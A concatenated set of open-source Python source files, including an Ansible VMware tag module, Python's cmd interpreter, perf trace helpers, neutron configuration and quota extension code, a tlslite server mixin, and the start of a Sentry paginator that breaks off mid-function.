# Copyright: (c) 2018, Abhijeet Kasurde <akasurde@redhat.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: vmware_tag
short_description: Manage VMware tags
description:
- This module can be used to create / delete / update VMware tags.
- Tag feature is introduced in vSphere 6 version, so this module is not supported in the earlier versions of vSphere.
- All variables and VMware object names are case sensitive.
version_added: '2.6'
author:
- Abhijeet Kasurde (@Akasurde)
notes:
- Tested on vSphere 6.5
requirements:
- python >= 2.6
- PyVmomi
- vSphere Automation SDK
options:
tag_name:
description:
- The name of tag to manage.
required: True
tag_description:
description:
- The tag description.
- This is required only if C(state) is set to C(present).
- This parameter is ignored, when C(state) is set to C(absent).
- Process of updating tag only allows description change.
required: False
default: ''
category_id:
description:
- The unique ID generated by vCenter should be used to.
- User can get this unique ID from facts module.
required: False
state:
description:
- The state of tag.
- If set to C(present) and tag does not exists, then tag is created.
- If set to C(present) and tag exists, then tag is updated.
- If set to C(absent) and tag exists, then tag is deleted.
- If set to C(absent) and tag does not exists, no action is taken.
required: False
default: 'present'
choices: [ 'present', 'absent' ]
extends_documentation_fragment: vmware_rest_client.documentation
'''
EXAMPLES = r'''
- name: Create a tag
vmware_tag:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
validate_certs: no
category_id: 'urn:vmomi:InventoryServiceCategory:e785088d-6981-4b1c-9fb8-1100c3e1f742:GLOBAL'
tag_name: Sample_Tag_0002
tag_description: Sample Description
state: present
delegate_to: localhost
- name: Update tag description
vmware_tag:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
tag_name: Sample_Tag_0002
tag_description: Some fancy description
state: present
delegate_to: localhost
- name: Delete tag
vmware_tag:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
tag_name: Sample_Tag_0002
state: absent
delegate_to: localhost
'''
RETURN = r'''
results:
description: dictionary of tag metadata
returned: on success
type: dict
sample: {
"msg": "Tag 'Sample_Tag_0002' created.",
"tag_id": "urn:vmomi:InventoryServiceTag:bff91819-f529-43c9-80ca-1c9dfda09441:GLOBAL"
}
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware_rest_client import VmwareRestClient
class VmwareTag(VmwareRestClient):
    """State machine for creating, updating and deleting vCenter tags."""

    def __init__(self, module):
        super(VmwareTag, self).__init__(module)
        # tag name -> metadata dict, filled by get_all_tags()
        self.global_tags = dict()
        # api_client to call APIs instead of individual service
        self.tag_service = self.api_client.tagging.Tag
        self.tag_name = self.params.get('tag_name')
        self.get_all_tags()
        self.category_service = self.api_client.tagging.Category

    def ensure_state(self):
        """
        Manage internal states of tags
        """
        desired_state = self.params.get('state')
        # (desired state, current state) -> handler
        states = {
            'present': {
                'present': self.state_update_tag,
                'absent': self.state_create_tag,
            },
            'absent': {
                'present': self.state_delete_tag,
                'absent': self.state_unchanged,
            }
        }
        states[desired_state][self.check_tag_status()]()

    def state_create_tag(self):
        """
        Create tag

        Requires 'category_id' in the module parameters; fails the module
        when it is missing or does not match any existing category.
        Exits the module with the new tag's id on success.
        """
        tag_spec = self.tag_service.CreateSpec()
        tag_spec.name = self.tag_name
        tag_spec.description = self.params.get('tag_description')
        category_id = self.params.get('category_id', None)
        if category_id is None:
            self.module.fail_json(msg="'category_id' is required parameter while creating tag.")
        category_found = False
        for category in self.category_service.list():
            category_obj = self.category_service.get(category)
            if category_id == category_obj.id:
                category_found = True
                break
        if not category_found:
            self.module.fail_json(msg="Unable to find category specified using 'category_id' - %s" % category_id)
        tag_spec.category_id = category_id
        tag_id = self.tag_service.create(tag_spec)
        if tag_id:
            self.module.exit_json(changed=True,
                                  results=dict(msg="Tag '%s' created." % tag_spec.name,
                                               tag_id=tag_id))
        self.module.exit_json(changed=False,
                              results=dict(msg="No tag created", tag_id=''))

    def state_unchanged(self):
        """
        Return unchanged state
        """
        self.module.exit_json(changed=False)

    def state_update_tag(self):
        """
        Update tag

        Only the description can change; the update is skipped (changed
        False) when the desired description matches the current one.
        """
        changed = False
        tag_id = self.global_tags[self.tag_name]['tag_id']
        results = dict(msg="Tag %s is unchanged." % self.tag_name,
                       tag_id=tag_id)
        tag_update_spec = self.tag_service.UpdateSpec()
        tag_desc = self.global_tags[self.tag_name]['tag_description']
        desired_tag_desc = self.params.get('tag_description')
        if tag_desc != desired_tag_desc:
            tag_update_spec.description = desired_tag_desc
            self.tag_service.update(tag_id, tag_update_spec)
            results['msg'] = 'Tag %s updated.' % self.tag_name
            changed = True
        self.module.exit_json(changed=changed, results=results)

    def state_delete_tag(self):
        """
        Delete tag
        """
        tag_id = self.global_tags[self.tag_name]['tag_id']
        self.tag_service.delete(tag_id=tag_id)
        self.module.exit_json(changed=True,
                              results=dict(msg="Tag '%s' deleted." % self.tag_name,
                                           tag_id=tag_id))

    def check_tag_status(self):
        """
        Check if tag exists or not
        Returns: 'present' if tag found, else 'absent'
        """
        ret = 'present' if self.tag_name in self.global_tags else 'absent'
        return ret

    def get_all_tags(self):
        """
        Retrieve all tag information

        Populates self.global_tags with one metadata dict per tag known
        to vCenter, keyed by tag name.
        """
        for tag in self.tag_service.list():
            tag_obj = self.tag_service.get(tag)
            self.global_tags[tag_obj.name] = dict(tag_description=tag_obj.description,
                                                  tag_used_by=tag_obj.used_by,
                                                  tag_category_id=tag_obj.category_id,
                                                  tag_id=tag_obj.id
                                                  )
def main():
    """Ansible entry point: build the argument spec and run the tag module."""
    spec = VmwareRestClient.vmware_client_argument_spec()
    spec.update(
        tag_name=dict(type='str', required=True),
        tag_description=dict(type='str', default='', required=False),
        category_id=dict(type='str', required=False),
        state=dict(type='str', choices=['present', 'absent'],
                   default='present', required=False),
    )
    module = AnsibleModule(argument_spec=spec)
    VmwareTag(module).ensure_state()


if __name__ == '__main__':
    main()
| gpl-3.0 |
javilonas/NCam | cross/android-toolchain/lib/python2.7/cmd.py | 145 | 15026 | """A generic class to build line-oriented command interpreters.
Interpreters constructed with this class obey the following conventions:
1. End of file on input is processed as the command 'EOF'.
2. A command is parsed out of each line by collecting the prefix composed
of characters in the identchars member.
3. A command `foo' is dispatched to a method 'do_foo()'; the do_ method
is passed a single argument consisting of the remainder of the line.
4. Typing an empty line repeats the last command. (Actually, it calls the
method `emptyline', which may be overridden in a subclass.)
5. There is a predefined `help' method. Given an argument `topic', it
calls the command `help_topic'. With no arguments, it lists all topics
with defined help_ functions, broken into up to three topics; documented
commands, miscellaneous help topics, and undocumented commands.
6. The command '?' is a synonym for `help'. The command '!' is a synonym
for `shell', if a do_shell method exists.
7. If completion is enabled, completing commands will be done automatically,
and completing of commands args is done by calling complete_foo() with
arguments text, line, begidx, endidx. text is string we are matching
against, all returned matches must begin with it. line is the current
input line (lstripped), begidx and endidx are the beginning and end
indexes of the text being matched, which could be used to provide
different completion depending upon which position the argument is in.
The `default' method may be overridden to intercept commands for which there
is no do_ method.
The `completedefault' method may be overridden to intercept completions for
commands that have no complete_ method.
The data member `self.ruler' sets the character used to draw separator lines
in the help messages. If empty, no ruler line is drawn. It defaults to "=".
If the value of `self.intro' is nonempty when the cmdloop method is called,
it is printed out on interpreter startup. This value may be overridden
via an optional argument to the cmdloop() method.
The data members `self.doc_header', `self.misc_header', and
`self.undoc_header' set the headers used for the help function's
listings of documented functions, miscellaneous topics, and undocumented
functions respectively.
These interpreters use raw_input; thus, if the readline module is loaded,
they automatically support Emacs-like command history and editing features.
"""
import string
__all__ = ["Cmd"]
PROMPT = '(Cmd) '
IDENTCHARS = string.ascii_letters + string.digits + '_'

class Cmd:
    """A simple framework for writing line-oriented command interpreters.

    These are often useful for test harnesses, administrative tools, and
    prototypes that will later be wrapped in a more sophisticated interface.

    A Cmd instance or subclass instance is a line-oriented interpreter
    framework.  There is no good reason to instantiate Cmd itself; rather,
    it's useful as a superclass of an interpreter class you define yourself
    in order to inherit Cmd's methods and encapsulate action methods.
    """
    # Interpreter-wide defaults; subclasses normally override a subset.
    prompt = PROMPT            # string issued before reading each line
    identchars = IDENTCHARS    # characters allowed in command names
    ruler = '='                # underline char for help section headers
    lastcmd = ''               # last nonempty command (replayed on empty input)
    intro = None               # banner printed when cmdloop() starts
    doc_leader = ""            # text printed before the help listing
    doc_header = "Documented commands (type help <topic>):"
    misc_header = "Miscellaneous help topics:"
    undoc_header = "Undocumented commands:"
    nohelp = "*** No help on %s"
    use_rawinput = 1           # read via raw_input() (enables readline editing)

    def __init__(self, completekey='tab', stdin=None, stdout=None):
        """Instantiate a line-oriented interpreter framework.

        The optional argument 'completekey' is the readline name of a
        completion key; it defaults to the Tab key. If completekey is
        not None and the readline module is available, command completion
        is done automatically. The optional arguments stdin and stdout
        specify alternate input and output file objects; if not specified,
        sys.stdin and sys.stdout are used.
        """
        import sys
        if stdin is not None:
            self.stdin = stdin
        else:
            self.stdin = sys.stdin
        if stdout is not None:
            self.stdout = stdout
        else:
            self.stdout = sys.stdout
        self.cmdqueue = []
        self.completekey = completekey

    def cmdloop(self, intro=None):
        """Repeatedly issue a prompt, accept input, parse an initial prefix
        off the received input, and dispatch to action methods, passing them
        the remainder of the line as argument.
        """
        self.preloop()
        # install our completer for the duration of the loop, restoring
        # the previous one on exit
        if self.use_rawinput and self.completekey:
            try:
                import readline
                self.old_completer = readline.get_completer()
                readline.set_completer(self.complete)
                readline.parse_and_bind(self.completekey+": complete")
            except ImportError:
                pass
        try:
            if intro is not None:
                self.intro = intro
            if self.intro:
                self.stdout.write(str(self.intro)+"\n")
            stop = None
            while not stop:
                # queued commands take priority over interactive input
                if self.cmdqueue:
                    line = self.cmdqueue.pop(0)
                else:
                    if self.use_rawinput:
                        try:
                            line = raw_input(self.prompt)
                        except EOFError:
                            line = 'EOF'
                    else:
                        self.stdout.write(self.prompt)
                        self.stdout.flush()
                        line = self.stdin.readline()
                        if not len(line):
                            # empty read means end of input stream
                            line = 'EOF'
                        else:
                            line = line.rstrip('\r\n')
                line = self.precmd(line)
                stop = self.onecmd(line)
                stop = self.postcmd(stop, line)
            self.postloop()
        finally:
            if self.use_rawinput and self.completekey:
                try:
                    import readline
                    readline.set_completer(self.old_completer)
                except ImportError:
                    pass

    def precmd(self, line):
        """Hook method executed just before the command line is
        interpreted, but after the input prompt is generated and issued.
        """
        return line

    def postcmd(self, stop, line):
        """Hook method executed just after a command dispatch is finished."""
        return stop

    def preloop(self):
        """Hook method executed once when the cmdloop() method is called."""
        pass

    def postloop(self):
        """Hook method executed once when the cmdloop() method is about to
        return.
        """
        pass

    def parseline(self, line):
        """Parse the line into a command name and a string containing
        the arguments.  Returns a tuple containing (command, args, line).
        'command' and 'args' may be None if the line couldn't be parsed.
        """
        line = line.strip()
        if not line:
            return None, None, line
        elif line[0] == '?':
            # '?' is a synonym for 'help'
            line = 'help ' + line[1:]
        elif line[0] == '!':
            # '!' is a synonym for 'shell', when a do_shell method exists
            if hasattr(self, 'do_shell'):
                line = 'shell ' + line[1:]
            else:
                return None, None, line
        # the command name is the longest identchars-only prefix
        i, n = 0, len(line)
        while i < n and line[i] in self.identchars: i = i+1
        cmd, arg = line[:i], line[i:].strip()
        return cmd, arg, line

    def onecmd(self, line):
        """Interpret the argument as though it had been typed in response
        to the prompt.

        This may be overridden, but should not normally need to be;
        see the precmd() and postcmd() methods for useful execution hooks.
        The return value is a flag indicating whether interpretation of
        commands by the interpreter should stop.
        """
        cmd, arg, line = self.parseline(line)
        if not line:
            return self.emptyline()
        if cmd is None:
            return self.default(line)
        self.lastcmd = line
        if line == 'EOF':
            # don't replay EOF on subsequent empty lines
            self.lastcmd = ''
        if cmd == '':
            return self.default(line)
        else:
            try:
                func = getattr(self, 'do_' + cmd)
            except AttributeError:
                return self.default(line)
            return func(arg)

    def emptyline(self):
        """Called when an empty line is entered in response to the prompt.

        If this method is not overridden, it repeats the last nonempty
        command entered.
        """
        if self.lastcmd:
            return self.onecmd(self.lastcmd)

    def default(self, line):
        """Called on an input line when the command prefix is not recognized.

        If this method is not overridden, it prints an error message and
        returns.
        """
        self.stdout.write('*** Unknown syntax: %s\n'%line)

    def completedefault(self, *ignored):
        """Method called to complete an input line when no command-specific
        complete_*() method is available.

        By default, it returns an empty list.
        """
        return []

    def completenames(self, text, *ignored):
        # complete against the do_* method names
        dotext = 'do_'+text
        return [a[3:] for a in self.get_names() if a.startswith(dotext)]

    def complete(self, text, state):
        """Return the next possible completion for 'text'.

        If a command has not been entered, then complete against command list.
        Otherwise try to call complete_<command> to get list of completions.
        """
        if state == 0:
            # first call for this text: (re)build the match list
            import readline
            origline = readline.get_line_buffer()
            line = origline.lstrip()
            stripped = len(origline) - len(line)
            begidx = readline.get_begidx() - stripped
            endidx = readline.get_endidx() - stripped
            if begidx > 0:
                # completing an argument: dispatch to complete_<cmd>
                cmd, args, foo = self.parseline(line)
                if cmd == '':
                    compfunc = self.completedefault
                else:
                    try:
                        compfunc = getattr(self, 'complete_' + cmd)
                    except AttributeError:
                        compfunc = self.completedefault
            else:
                # completing the command name itself
                compfunc = self.completenames
            self.completion_matches = compfunc(text, line, begidx, endidx)
        try:
            return self.completion_matches[state]
        except IndexError:
            return None

    def get_names(self):
        # This method used to pull in base class attributes
        # at a time dir() didn't do it yet.
        return dir(self.__class__)

    def complete_help(self, *args):
        # help topics come from both do_* commands and help_* methods
        commands = set(self.completenames(*args))
        topics = set(a[5:] for a in self.get_names()
                     if a.startswith('help_' + args[0]))
        return list(commands | topics)

    def do_help(self, arg):
        'List available commands with "help" or detailed help with "help cmd".'
        if arg:
            # XXX check arg syntax
            try:
                func = getattr(self, 'help_' + arg)
            except AttributeError:
                # no help_<arg> method: fall back to do_<arg>'s docstring
                try:
                    doc=getattr(self, 'do_' + arg).__doc__
                    if doc:
                        self.stdout.write("%s\n"%str(doc))
                        return
                except AttributeError:
                    pass
                self.stdout.write("%s\n"%str(self.nohelp % (arg,)))
                return
            func()
        else:
            # no topic given: list everything, split into documented
            # commands, misc help topics and undocumented commands
            names = self.get_names()
            cmds_doc = []
            cmds_undoc = []
            help = {}
            for name in names:
                if name[:5] == 'help_':
                    help[name[5:]]=1
            names.sort()
            # There can be duplicates if routines overridden
            prevname = ''
            for name in names:
                if name[:3] == 'do_':
                    if name == prevname:
                        continue
                    prevname = name
                    cmd=name[3:]
                    if cmd in help:
                        cmds_doc.append(cmd)
                        del help[cmd]
                    elif getattr(self, name).__doc__:
                        cmds_doc.append(cmd)
                    else:
                        cmds_undoc.append(cmd)
            self.stdout.write("%s\n"%str(self.doc_leader))
            self.print_topics(self.doc_header,   cmds_doc,   15,80)
            self.print_topics(self.misc_header,  help.keys(),15,80)
            self.print_topics(self.undoc_header, cmds_undoc, 15,80)

    def print_topics(self, header, cmds, cmdlen, maxcol):
        # print one help section: header, optional ruler line, columns
        if cmds:
            self.stdout.write("%s\n"%str(header))
            if self.ruler:
                self.stdout.write("%s\n"%str(self.ruler * len(header)))
            self.columnize(cmds, maxcol-1)
            self.stdout.write("\n")

    def columnize(self, list, displaywidth=80):
        """Display a list of strings as a compact set of columns.

        Each column is only as wide as necessary.
        Columns are separated by two spaces (one was not legible enough).
        """
        if not list:
            self.stdout.write("<empty>\n")
            return
        nonstrings = [i for i in range(len(list))
                      if not isinstance(list[i], str)]
        if nonstrings:
            raise TypeError, ("list[i] not a string for i in %s" %
                              ", ".join(map(str, nonstrings)))
        size = len(list)
        if size == 1:
            self.stdout.write('%s\n'%str(list[0]))
            return
        # Try every row count from 1 upwards
        for nrows in range(1, len(list)):
            ncols = (size+nrows-1) // nrows
            colwidths = []
            totwidth = -2
            for col in range(ncols):
                colwidth = 0
                for row in range(nrows):
                    i = row + nrows*col
                    if i >= size:
                        break
                    x = list[i]
                    colwidth = max(colwidth, len(x))
                colwidths.append(colwidth)
                totwidth += colwidth + 2
                if totwidth > displaywidth:
                    break
            if totwidth <= displaywidth:
                break
        else:
            # nothing fit: fall back to a single column
            nrows = len(list)
            ncols = 1
            colwidths = [0]
        for row in range(nrows):
            texts = []
            for col in range(ncols):
                i = row + nrows*col
                if i >= size:
                    x = ""
                else:
                    x = list[i]
                texts.append(x)
            # drop trailing empty cells on the last row(s)
            while texts and not texts[-1]:
                del texts[-1]
            for col in range(len(texts)):
                texts[col] = texts[col].ljust(colwidths[col])
            self.stdout.write("%s\n"%str("  ".join(texts)))
| gpl-3.0 |
burstlam/zte-kernel-gb | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Core.py | 802 | 2710 | # Core.py - Python extension for perf trace, core functions
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
from collections import defaultdict
def autodict():
    """Return a dict that transparently creates nested dicts on access
    (an arbitrarily deep defaultdict-of-defaultdicts)."""
    return defaultdict(autodict)
# Per-event lookup tables filled in by the define_* callbacks below:
#   flag_fields[event][field]     -> {'delim': str, 'values': {bit: name}}
#   symbolic_fields[event][field] -> {'values': {value: name}}
flag_fields = autodict()
symbolic_fields = autodict()
def define_flag_field(event_name, field_name, delim):
    # Register the delimiter printed between flag names for this field.
    flag_fields[event_name][field_name]['delim'] = delim
def define_flag_value(event_name, field_name, value, field_str):
    # Map one flag bit to its printable name for this field.
    flag_fields[event_name][field_name]['values'][value] = field_str
def define_symbolic_field(event_name, field_name):
    """Placeholder: symbolic fields need no per-field setup; values are
    registered directly via define_symbolic_value()."""
    # nothing to do, really
    pass
def define_symbolic_value(event_name, field_name, value, field_str):
    # Map one concrete value to its printable name for this field.
    symbolic_fields[event_name][field_name]['values'][value] = field_str
def flag_str(event_name, field_name, value):
    """Render *value* as a delimiter-joined string of the flag names
    registered for (event_name, field_name) in the module-level
    flag_fields table.  Bits without a registered name are ignored."""
    string = ""
    if flag_fields[event_name][field_name]:
        print_delim = 0
        # sorted() replaces the Py2-only `keys = d.keys(); keys.sort()`
        # pattern (dict views have no .sort() on Python 3); iteration
        # order over the flag bits is ascending either way.
        for idx in sorted(flag_fields[event_name][field_name]['values'].keys()):
            if not value and not idx:
                # value == 0 and a name is registered for 0: use it alone.
                string += flag_fields[event_name][field_name]['values'][idx]
                break
            if idx and (value & idx) == idx:
                if print_delim and flag_fields[event_name][field_name]['delim']:
                    string += " " + flag_fields[event_name][field_name]['delim'] + " "
                string += flag_fields[event_name][field_name]['values'][idx]
                print_delim = 1
                value &= ~idx
    return string
def symbol_str(event_name, field_name, value):
    """Return the printable name registered for *value* in the
    module-level symbolic_fields table, or "" if none matches."""
    string = ""
    if symbolic_fields[event_name][field_name]:
        # sorted() replaces the Py2-only `keys = d.keys(); keys.sort()`
        # pattern (dict views have no .sort() on Python 3).
        for idx in sorted(symbolic_fields[event_name][field_name]['values'].keys()):
            if not value and not idx:
                string = symbolic_fields[event_name][field_name]['values'][idx]
                break
            if (value == idx):
                string = symbolic_fields[event_name][field_name]['values'][idx]
                break
    return string
# Common trace-record flag bits mapped to printable names; consumed by
# trace_flag_str() below.  NOTE(review): presumably mirrors the kernel's
# trace_flag_type enum -- confirm against the kernel headers.
trace_flags = { 0x00: "NONE", \
                0x01: "IRQS_OFF", \
                0x02: "IRQS_NOSUPPORT", \
                0x04: "NEED_RESCHED", \
                0x08: "HARDIRQ", \
                0x10: "SOFTIRQ" }
def trace_flag_str(value):
    """Render the trace flag bits set in *value* as a " | "-joined string
    of names from the module-level trace_flags table."""
    string = ""
    print_delim = 0
    # Iterate the flag bits in ascending order so the output is
    # deterministic regardless of dict iteration order, consistent with
    # flag_str()/symbol_str().
    for idx in sorted(trace_flags.keys()):
        if not value and not idx:
            string += "NONE"
            break
        if idx and (value & idx) == idx:
            if print_delim:
                string += " | "
            string += trace_flags[idx]
            print_delim = 1
            value &= ~idx
    return string
| gpl-2.0 |
blueboxgroup/neutron | neutron/agent/l3/config.py | 1 | 2906 | # Copyright (c) 2015 OpenStack Foundation.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
# Configuration options for the neutron L3 agent, registered by the agent
# at startup.  NOTE(review): `_` here is the translation hook installed
# globally by neutron's i18n setup, not a local import -- confirm.
OPTS = [
    cfg.StrOpt('agent_mode', default='legacy',
               help=_("The working mode for the agent. Allowed modes are: "
                      "'legacy' - this preserves the existing behavior "
                      "where the L3 agent is deployed on a centralized "
                      "networking node to provide L3 services like DNAT, "
                      "and SNAT. Use this mode if you do not want to "
                      "adopt DVR. 'dvr' - this mode enables DVR "
                      "functionality and must be used for an L3 agent "
                      "that runs on a compute host. 'dvr_snat' - this "
                      "enables centralized SNAT support in conjunction "
                      "with DVR. This mode must be used for an L3 agent "
                      "running on a centralized node (or in single-host "
                      "deployments, e.g. devstack)")),
    cfg.StrOpt('external_network_bridge', default='br-ex',
               help=_("Name of bridge used for external network "
                      "traffic.")),
    cfg.IntOpt('metadata_port',
               default=9697,
               help=_("TCP Port used by Neutron metadata namespace "
                      "proxy.")),
    cfg.IntOpt('send_arp_for_ha',
               default=3,
               help=_("Send this many gratuitous ARPs for HA setup, if "
                      "less than or equal to 0, the feature is disabled")),
    cfg.StrOpt('router_id', default='',
               help=_("If namespaces is disabled, the l3 agent can only"
                      " configure a router that has the matching router "
                      "ID.")),
    cfg.BoolOpt('handle_internal_only_routers',
                default=True,
                help=_("Agent should implement routers with no gateway")),
    cfg.StrOpt('gateway_external_network_id', default='',
               help=_("UUID of external network for routers implemented "
                      "by the agents.")),
    cfg.BoolOpt('enable_metadata_proxy', default=True,
                help=_("Allow running metadata proxy.")),
    cfg.BoolOpt('router_delete_namespaces', default=False,
                help=_("Delete namespace after removing a router."))
]
| apache-2.0 |
mahak/neutron | neutron/extensions/quotasv2_detail.py | 2 | 3597 | # Copyright 2017 Intel Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api import extensions as api_extensions
from neutron_lib.api import faults
from neutron_lib import exceptions as n_exc
from neutron_lib.plugins import directory
from oslo_config import cfg
from neutron._i18n import _
from neutron.api import extensions
from neutron.api.v2 import resource
from neutron.db.quota import driver
from neutron.db.quota import driver_nolock
from neutron.extensions import quotasv2
from neutron.quota import resource_registry
# Extension wiring constants.
DETAIL_QUOTAS_ACTION = 'details'
RESOURCE_NAME = 'quota'
# Extension alias: "quota_details".
ALIAS = RESOURCE_NAME + '_' + DETAIL_QUOTAS_ACTION
# Quota driver selected in configuration, captured at import time.
QUOTA_DRIVER = cfg.CONF.QUOTAS.quota_driver
RESOURCE_COLLECTION = RESOURCE_NAME + "s"
# Dotted paths of the DB-backed quota drivers that support detail queries.
DB_QUOTA_DRIVERS = tuple('.'.join([klass.__module__, klass.__name__])
                         for klass in (driver.DbQuotaDriver,
                                       driver_nolock.DbQuotaNoLockDriver,
                                       )
                         )
# This extension adds no new attributes to the quotas resource.
EXTENDED_ATTRIBUTES_2_0 = {
    RESOURCE_COLLECTION: {}
}
class DetailQuotaSetsController(quotasv2.QuotaSetsController):
    """Quota controller that additionally exposes per-resource usage
    details via the `details` member action."""

    def _get_detailed_quotas(self, request, tenant_id):
        """Ask the quota driver for detailed quotas of *tenant_id* across
        every registered resource."""
        all_resources = resource_registry.get_all_resources()
        return self._driver.get_detailed_tenant_quotas(
            request.context, all_resources, tenant_id)

    def details(self, request, id):
        """Return detailed quotas for project *id*.

        Non-admin callers may only query their own project; anything else
        raises AdminRequired.
        """
        context = request.context
        # Check if admin
        if id != context.project_id and not context.is_admin:
            reason = _("Only admin is authorized to access quotas for"
                       " another tenant")
            raise n_exc.AdminRequired(reason=reason)
        return {self._resource_name: self._get_detailed_quotas(request, id)}
class Quotasv2_detail(api_extensions.ExtensionDescriptor):
    """Quota details management support."""

    # Ensure new extension is not loaded with old conf driver.
    # (Runs at class-definition time: the extension is reported as
    # unsupported unless one of the DB-backed quota drivers is configured.)
    extensions.register_custom_supported_check(
        ALIAS, lambda: QUOTA_DRIVER in DB_QUOTA_DRIVERS, plugin_agnostic=True)

    @classmethod
    def get_name(cls):
        return "Quota details management support"

    @classmethod
    def get_alias(cls):
        return ALIAS

    @classmethod
    def get_description(cls):
        return 'Expose functions for quotas usage statistics per project'

    @classmethod
    def get_updated(cls):
        return "2017-02-10T10:00:00-00:00"

    @classmethod
    def get_resources(cls):
        """Returns Extension Resources."""
        # Wrap the detail controller so GET /quotas/<id>/details and
        # GET /quotas/tenant are routed to it.
        controller = resource.Resource(
            DetailQuotaSetsController(directory.get_plugin()),
            faults=faults.FAULT_MAP)
        return [extensions.ResourceExtension(
            RESOURCE_COLLECTION,
            controller,
            member_actions={'details': 'GET'},
            collection_actions={'tenant': 'GET'})]

    def get_extended_resources(self, version):
        # No attribute map changes; only new actions on the existing API.
        return EXTENDED_ATTRIBUTES_2_0 if version == "2.0" else {}

    def get_required_extensions(self):
        # Detail quotas only make sense on top of the base quotas extension.
        return ["quotas"]
| apache-2.0 |
kampanita/pelisalacarta | python/main-classic/lib/gdata/tlslite/integration/TLSSocketServerMixIn.py | 320 | 2203 | """TLS Lite + SocketServer."""
from gdata.tlslite.TLSConnection import TLSConnection
class TLSSocketServerMixIn:
    """
    This class can be mixed in with any L{SocketServer.TCPServer} to
    add TLS support.

    To use this class, define a new class that inherits from it and
    some L{SocketServer.TCPServer} (with the mix-in first). Then
    implement the handshake() method, doing some sort of server
    handshake on the connection argument.  If the handshake method
    returns True, the RequestHandler will be triggered.  Below is a
    complete example of a threaded HTTPS server::

        from SocketServer import *
        from BaseHTTPServer import *
        from SimpleHTTPServer import *
        from tlslite.api import *

        s = open("./serverX509Cert.pem").read()
        x509 = X509()
        x509.parse(s)
        certChain = X509CertChain([x509])

        s = open("./serverX509Key.pem").read()
        privateKey = parsePEMKey(s, private=True)

        sessionCache = SessionCache()

        class MyHTTPServer(ThreadingMixIn, TLSSocketServerMixIn,
                           HTTPServer):
            def handshake(self, tlsConnection):
                try:
                    tlsConnection.handshakeServer(certChain=certChain,
                                                  privateKey=privateKey,
                                                  sessionCache=sessionCache)
                    tlsConnection.ignoreAbruptClose = True
                    return True
                except TLSError, error:
                    print "Handshake failure:", str(error)
                    return False

        httpd = MyHTTPServer(('localhost', 443), SimpleHTTPRequestHandler)
        httpd.serve_forever()
    """

    def finish_request(self, sock, client_address):
        # Wrap the freshly accepted socket in a TLSConnection and only
        # dispatch to the request handler when handshake() compares equal
        # to True; any other return value skips the handler.  The
        # connection is closed in both cases.
        tlsConnection = TLSConnection(sock)
        if self.handshake(tlsConnection) == True:
            self.RequestHandlerClass(tlsConnection, client_address, self)
        tlsConnection.close()

    #Implement this method to do some form of handshaking.  Return True
    #if the handshake finishes properly and the request is authorized.
    def handshake(self, tlsConnection):
        raise NotImplementedError()
| gpl-3.0 |
vperron/sentry | src/sentry/api/paginator.py | 16 | 4291 | """
sentry.api.paginator
~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import math
from datetime import datetime
from django.db import connections
from django.utils import timezone
from sentry.utils.cursors import build_cursor, Cursor
quote_name = connections['default'].ops.quote_name
class Paginator(object):
    """Cursor-based paginator over a Django queryset ordered by a single
    column.  *order_by* names the column, optionally prefixed with '-'
    for descending order."""

    def __init__(self, queryset, order_by):
        if order_by.startswith('-'):
            self.key, self.desc = order_by[1:], True
        else:
            self.key, self.desc = order_by, False
        self.queryset = queryset

    def _get_item_key(self, item):
        """Cursor key for *item*: the sort-column value rounded toward
        the sort direction (ceil when descending, floor when ascending)."""
        value = getattr(item, self.key)
        if self.desc:
            return math.ceil(value)
        return math.floor(value)

    def _value_from_cursor(self, cursor):
        # Identity for numeric sort columns; subclasses may decode
        # (see DateTimePaginator).
        return cursor.value

    def _get_results_from_qs(self, value, is_prev):
        """Return the queryset ordered and bounded so iteration starts at
        cursor *value* (inclusive).

        NOTE(review): when the key already appears in query.order_by this
        mutates that list in place on self.queryset's query -- presumably
        acceptable in this codebase; confirm.
        """
        results = self.queryset

        # "asc" controls whether or not we need to change the ORDER BY to
        # ascending. If we're sorting by DESC but we're using a previous
        # page cursor, we'll change the ordering to ASC and reverse the
        # list below (this is so we know how to get the before/after post).
        # If we're sorting ASC _AND_ we're not using a previous page cursor,
        # then we'll need to resume using ASC.
        asc = (self.desc and is_prev) or not (self.desc or is_prev)

        # We need to reverse the ORDER BY if we're using a cursor for a
        # previous page so we know exactly where we ended last page. The
        # results will get reversed back to the requested order below.
        if self.key in results.query.order_by:
            if not asc:
                index = results.query.order_by.index(self.key)
                results.query.order_by[index] = '-%s' % (results.query.order_by[index])
        elif ('-%s' % self.key) in results.query.order_by:
            if asc:
                index = results.query.order_by.index('-%s' % (self.key))
                results.query.order_by[index] = results.query.order_by[index][1:]
        else:
            if asc:
                results = results.order_by(self.key)
